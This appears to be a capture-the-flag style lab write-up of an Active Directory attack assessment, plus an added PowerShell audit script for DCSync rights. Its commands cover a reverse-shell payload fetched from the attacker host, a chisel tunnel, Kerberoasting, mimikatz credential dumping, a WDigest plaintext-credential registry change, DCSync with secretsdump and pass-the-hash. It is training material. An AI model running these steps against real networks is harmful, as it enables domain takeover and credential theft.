AD Enumeration & Attacks Skills Assessment Part I

Initial Access

Reconnaissance

Given the scenario, we get the user admin and the password My_W3bsH3ll_*********, so we login with the credentials:

Login

Question 1 — Submit the contents of the flag.txt file on the administrator Desktop of the web server

We can access the contents of the Administrator Desktop, so I just grabbed the flag:

cmd
type C:\Users\Administrator\Desktop\flag.txt
Flag 1

Reverse Shell Using Metasploit

Payload Generation

bash
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker_ip> LPORT=4444 -f exe -o payload.exe
Payload Generation

Metasploit Listener Configuration

bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 10.10.15.161
set LPORT 4444
Listener Config

Payload Delivery and Execution

bash
python3 -m http.server

Using curl to download and execute the payload:

powershell
curl 10.10.15.161:8000/payload.exe -o payload.exe
.\payload.exe
Payload Delivery

Got the shell.

Shell

Question 2 — Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name

Enumerating SPNs with setspn.exe:

cmd
setspn.exe -Q */*
SPN Enumeration

Got the answer: s*****l

Question 3 — Crack the account's password. Submit the cleartext value.

To get the password we can use PowerView. Serve it with a Python HTTP server, download with curl, then import:

powershell
Import-Module .\PowerView.ps1
PowerView Import

Get the SPN ticket:

powershell
Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
SPN Ticket

Got the hash. Crack it with Hashcat, which gives us the password lu***7:

bash
hashcat -m 13100 svc_sql_hash /usr/share/wordlists/rockyou.txt

Question 4 — Submit the contents of the flag.txt file on the Administrator desktop on MS01

Before proceeding, get the IP of MS01 by pinging it; it resolves to 172.16.6.**.

MS01 IP

Login to MS01 with the credentials we found:

powershell
$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\svc_sql", $password)
Enter-PSSession -ComputerName MS01-INLANEFREIGHT.LOCAL -Credential $cred
PSSession

It worked, but grabbing the flag directly didn't. Needed a proper shell — tried Metasploit SOCKS proxy but it wasn't working, so I used chisel.exe instead.

Tip: chisel's R:socks listener binds to 127.0.0.1:1080 on the server side by default, so add (or change to) `socks5 127.0.0.1 1080` in the proxychains config.

On attack machine (Linux):

bash
chisel server -p 9088 --reverse

On target machine (Windows):

cmd
chisel.exe client <attacker_ip>:9088 R:socks
Chisel Tunnel

Now using impacket-psexec to get the flag:

bash
proxychains impacket-psexec INLANEFREIGHT.LOCAL/<user>:<password>@<Target>
PSExec Flag

Question 5 — Find cleartext credentials for another domain user. Submit the username.

Ran an nmap scan and found RDP open, so I logged in using xfreerdp with a shared directory containing all the tools we may need:

bash
proxychains xfreerdp /v:'172.16.6.**:3389' /u:"inlanefreight\<user>" /p:'<password>' /drive:Shared,/opt/test
RDP Login

Ran Inveigh first but found nothing.

Inveigh

Went with mimikatz:

cmd
privilege::debug
sekurlsa::logonpasswords
Mimikatz Output

Got user t***** on domain DC01 — that's the answer.

Question 6 — Submit this user's cleartext password.

The password showed as none in the previous dump. To get it we need to force WDigest to store credentials in plaintext via a registry modification, then reboot:

cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
WDigest Registry

After restarting, we get the cleartext password:

Cleartext Password

Question 7 — What attack can this user perform?

Guessed DCSync and it was correct. To confirm why, we use PowerView to check the user's ACL permissions on the domain:

powershell
Import-Module .\PowerView.ps1
Get-DomainUser -Identity <user> | select samaccountname,objectsid,memberof,useraccountcontrol | fl
$sid = "S-1-..."
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
ACL Check

DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes-In-Filtered-Set are all present — this allows the user to pull replication data from the AD database, enabling a DCSync attack.
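As an added defender-side check (not part of the writeup), the following PowerShell script uses the RSAT ActiveDirectory module (assumed to be installed) to list every principal holding the replication rights discussed above on the domain object, and flags the combination that actually enables DCSync; the domain DN is the one from this assessment.

```powershell
# Added example (not from the writeup): audit the domain object's ACL for the
# replication extended rights DCSync relies on. Needs the RSAT ActiveDirectory
# module; the DN below is the writeup's domain, substitute your own.
Import-Module ActiveDirectory

# Well-known control-access-right GUIDs; PowerView's -ResolveGUIDs maps these to
# the names shown in the writeup's output.
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    param([string]$DomainDN = 'DC=inlanefreight,DC=local')
    $acl = Get-Acl -Path "AD:\$DomainDN"
    $byPrincipal = @{}
    foreach ($ace in $acl.Access) {
        # Keep Allow ACEs that grant ExtendedRight with one of the three GUIDs.
        # Caveat: GenericAll (ObjectType all zeros) implies them too; check it separately.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $er = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
        if (-not $ace.ActiveDirectoryRights.HasFlag($er)) { continue }
        $guid = $ace.ObjectType.ToString().ToLower()
        if (-not $ReplRights.ContainsKey($guid)) { continue }
        $who = $ace.IdentityReference.Value
        if (-not $byPrincipal.ContainsKey($who)) {
            $byPrincipal[$who] = [System.Collections.Generic.HashSet[string]]::new()
        }
        [void]$byPrincipal[$who].Add($ReplRights[$guid])
    }

    foreach ($who in $byPrincipal.Keys) {
        $rights = $byPrincipal[$who]
        # Dumping secrets needs Get-Changes together with Get-Changes-All;
        # In-Filtered-Set alone is not enough.
        $canSync = $rights.Contains('DS-Replication-Get-Changes') -and
                   $rights.Contains('DS-Replication-Get-Changes-All')
        [pscustomobject]@{
            Principal = $who
            Rights    = ($rights | Sort-Object) -join ', '
            CanDCSync = $canSync
        }
    }
}

# Built-in holders such as Administrators, Domain Controllers and Enterprise Domain
# Controllers are expected; any other principal with CanDCSync = True needs an explanation.
Get-ReplicationRightHolders | Sort-Object CanDCSync -Descending | Format-Table -AutoSize
```

Run it as a domain user from a host with RSAT; read access to the domain object's security descriptor is all it needs.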

Question 8 — Take over the domain and submit the flag on the Administrator Desktop on DC01

Use Runas to operate as t*****, then dump Administrator hashes via impacket-secretsdump (get DC01 IP by pinging it first):

bash
proxychains impacket-secretsdump -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/<user>@<ip>

With the hash, pass it using crackmapexec to get the final flag:

bash
proxychains crackmapexec smb <ip> -u Administrator -H <hash> -x 'type C:\Users\Administrator\Desktop\flag.txt'